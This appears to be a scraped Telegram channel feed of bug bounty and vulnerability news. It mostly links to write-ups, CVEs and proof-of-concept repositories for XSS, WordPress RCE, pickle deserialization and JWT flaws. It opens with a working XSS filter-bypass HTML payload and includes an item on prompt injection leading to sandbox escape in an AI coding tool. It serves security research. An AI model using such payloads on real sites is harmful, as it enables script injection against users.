XSS without "/", "=" or whitespace by Masato Kinugawa 🤯🔥
Payloads:
🔗 https://x.com/kinugawamasato/status/2074241010776072266
Payloads:
<!--XSS-->
<select>
<button><selectedcontent>
<button>
<option>
<svg><script>alert()<foo>
<!-- ↓ legitimate page content -->
<div foo="bar">baz</div>
<body>
</html>
🔗 https://x.com/kinugawamasato/status/2074241010776072266
🔥3❤1
This media is not supported in your browser
VIEW IN TELEGRAM
$3,700 Anthropic Bug Bounty 🤑
[CVE-2026-55607] Claude Code: unsandboxed code execution from prompt injection via .git worktree confusion by Metnew 🤯🔥
👨💻 Metnew (x/v_metnew)
🔗 https://github.com/Metnew/write-ups/tree/main/claude-code-worktree-sandbox-escape
🔗 https://nvd.nist.gov/vuln/detail/CVE-2026-55607
🔗 https://github.com/anthropics/claude-code/security/advisories/GHSA-7835-87q9-rgvv
[CVE-2026-55607] Claude Code: unsandboxed code execution from prompt injection via .git worktree confusion by Metnew 🤯🔥
👨💻 Metnew (x/v_metnew)
🔗 https://github.com/Metnew/write-ups/tree/main/claude-code-worktree-sandbox-escape
🔗 https://nvd.nist.gov/vuln/detail/CVE-2026-55607
🔗 https://github.com/anthropics/claude-code/security/advisories/GHSA-7835-87q9-rgvv
🔥6❤1
$100 Tor Project Bug Bounty 🤑
Malicious Conflux Endpoint Can Leave Stale Global OOO Queue Accounting After Teardown by aptupdate 🤯🔥
👨💻 aptupdate (h1/aptupdate)
🔗 https://hackerone.com/reports/3701692
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
Malicious Conflux Endpoint Can Leave Stale Global OOO Queue Accounting After Teardown by aptupdate 🤯🔥
👨💻 aptupdate (h1/aptupdate)
🔗 https://hackerone.com/reports/3701692
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
👍2❤1
Hardcoded Bearer Token in Client-Side JavaScript Enables Critical Broken Access Control (All Chats Exposed) by Elnwasani 🤯🔥
👨💻 Hamed Elnwasani (x/0xhamdoon)
🔗 https://0xhamdoon.medium.com/hardcoded-bearer-token-in-client-side-javascript-enables-critical-broken-access-control-all-chats-7f4e0ba6978a
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
👨💻 Hamed Elnwasani (x/0xhamdoon)
🔗 https://0xhamdoon.medium.com/hardcoded-bearer-token-in-client-side-javascript-enables-critical-broken-access-control-all-chats-7f4e0ba6978a
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
❤2👍1
NVIDIA GEN3C: Unauthenticated RCE via Pickle Deserialization in Inference API by Lobstein 🤯🔥
👨💻 Valentin Lobstein (ʞʞıdɐɔoɥƆ)
🔗 https://chocapikk.com/posts/2026/gen3c-pickle-rce/
👨💻 Valentin Lobstein (ʞʞıdɐɔoɥƆ)
🔗 https://chocapikk.com/posts/2026/gen3c-pickle-rce/
🔥4
One Misconfigured Server, Three Active Campaigns: Full exposure of three AiTM Phishing Operators 🤯🔥
👨💻 Lexfo Team
🔗 https://blog.lexfo.fr/opendir-to-phishing-operator.html
👨💻 Lexfo Team
🔗 https://blog.lexfo.fr/opendir-to-phishing-operator.html
🔥4
Hacking Apple - SQL Injection to Remote Code Execution by Jaiswal & Rahul 🤯🔥
👨💻 Harsh Jaiswal & Rahul Maini (ProjectDiscovery)
🔗 https://projectdiscovery.io/blog/hacking-apple-with-sql-injection
🔗 https://www.cve.org/CVERecord?id=CVE-2024-32640
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
👨💻 Harsh Jaiswal & Rahul Maini (ProjectDiscovery)
🔗 https://projectdiscovery.io/blog/hacking-apple-with-sql-injection
🔗 https://www.cve.org/CVERecord?id=CVE-2024-32640
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
❤3😁1
OAuth Client ID Spoofing Lets Attackers Validate Stolen Microsoft Entra Credentials 👾⚠️
🔗 https://thehackernews.com/2026/07/oauth-client-id-spoofing-lets-attackers.html
🔗 https://thehackernews.com/2026/07/oauth-client-id-spoofing-lets-attackers.html
❤4
$337 Basecamp Bug Bounty 🤑
Stored XSS on Trix Editor version latest (2.1.16) - Sanitizer Bypass by jeeva 🤯🔥
👨💻 jeeva (h1/newbiefromcoma)
🔗 https://hackerone.com/reports/3581911
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
Stored XSS on Trix Editor version latest (2.1.16) - Sanitizer Bypass by jeeva 🤯🔥
👨💻 jeeva (h1/newbiefromcoma)
🔗 https://hackerone.com/reports/3581911
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
❤5🔥1
Discovering hidden parameters: An advanced guide 🤯🔥
👨💻 blackbird (intigriti)
🔗 https://www.intigriti.com/researchers/blog/hacking-tools/finding-hidden-input-parameters
👨💻 blackbird (intigriti)
🔗 https://www.intigriti.com/researchers/blog/hacking-tools/finding-hidden-input-parameters
🔥3
The $0 IDOR That Was Worth More Than a $12,500 P1 by Meena 🤯🔥
👨💻 Abhishek Meena (Aacle)
🔗 https://medium.com/bugbountywriteup/the-0-idor-that-was-worth-more-than-a-12-500-p1-4444d32f2f61
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
👨💻 Abhishek Meena (Aacle)
🔗 https://medium.com/bugbountywriteup/the-0-idor-that-was-worth-more-than-a-12-500-p1-4444d32f2f61
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
🔥2
AsyncAPI npm packages backdoored via GitHub Actions by Silva 🤯🔥
👨💻 Raphael Silva (Aikido Security)
🔗 https://www.aikido.dev/blog/asyncapi-npm-packages-backdoored-via-github-actions
👨💻 Raphael Silva (Aikido Security)
🔗 https://www.aikido.dev/blog/asyncapi-npm-packages-backdoored-via-github-actions
❤3
This media is not supported in your browser
VIEW IN TELEGRAM
[CVE-2026-63030/CVE-2026-60137]
wp2shell: Pre Authentication RCE in WordPress Core Searchlight Cyber Team 🤯🔥
👨💻 Adam Kues (x/hash_kitten)
🔗 https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/
🔗 https://wp2shell.com/
🔗 https://nvd.nist.gov/vuln/detail/CVE-2026-60137
🔗 https://nvd.nist.gov/vuln/detail/CVE-2026-63030
wp2shell: Pre Authentication RCE in WordPress Core Searchlight Cyber Team 🤯🔥
👨💻 Adam Kues (x/hash_kitten)
🔗 https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/
🔗 https://wp2shell.com/
🔗 https://nvd.nist.gov/vuln/detail/CVE-2026-60137
🔗 https://nvd.nist.gov/vuln/detail/CVE-2026-63030
🔥3🤔1
PoC:
[CVE-2026-63030/CVE-2026-60137] Pre Authentication RCE in WordPress Core 👾💥
- https://github.com/0xsha/wp2shell
- https://github.com/Icex0/wp2shell-poc
- https://github.com/sergiointel/wp2shell-poc
- https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/
- https://nvd.nist.gov/vuln/detail/CVE-2026-60137
- https://nvd.nist.gov/vuln/detail/CVE-2026-63030
[CVE-2026-63030/CVE-2026-60137] Pre Authentication RCE in WordPress Core 👾💥
- https://github.com/0xsha/wp2shell
- https://github.com/Icex0/wp2shell-poc
- https://github.com/sergiointel/wp2shell-poc
- https://slcyber.io/research-center/wp2shell-pre-authentication-rce-in-wordpress-core/
- https://nvd.nist.gov/vuln/detail/CVE-2026-60137
- https://nvd.nist.gov/vuln/detail/CVE-2026-63030
❤2👍1
$1,600 Shopify Bug Bounty 🤑
Reflected XSS in AI Chat Bot Greetings at help.shopify.com via Markdown Image Rendering by saltymermaid 🤯🔥
👨💻 saltymermaid
🔗 https://hackerone.com/reports/2509022
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
Reflected XSS in AI Chat Bot Greetings at help.shopify.com via Markdown Image Rendering by saltymermaid 🤯🔥
👨💻 saltymermaid
🔗 https://hackerone.com/reports/2509022
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
🔥5❤1
Bypassing LFI (Local File Inclusion) by Yadav 👾💥
👨💻 Abhishek Yadav (x/abhishekY495)
🔗 https://medium.com/@abhishekY495/bypassing-lfi-local-file-inclusion-ebf4274e7027
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
👨💻 Abhishek Yadav (x/abhishekY495)
🔗 https://medium.com/@abhishekY495/bypassing-lfi-local-file-inclusion-ebf4274e7027
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
❤1
$1,337 8x8 Bug Bounty 🤑
connect.8x8.com/api/v1: JWT Algorithm Confusion Vulnerability by Ferreira 🤯🔥
👨💻 Kauã Ferreira (x/0xkyotozx)
🔗 https://hackerone.com/reports/3800870
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
connect.8x8.com/api/v1: JWT Algorithm Confusion Vulnerability by Ferreira 🤯🔥
👨💻 Kauã Ferreira (x/0xkyotozx)
🔗 https://hackerone.com/reports/3800870
🔗 https://t.me/ZeroToBug
🔗 https://whatsapp.com/channel/0029VbCTM6RDp2QAFE8r140p
🔥3❤1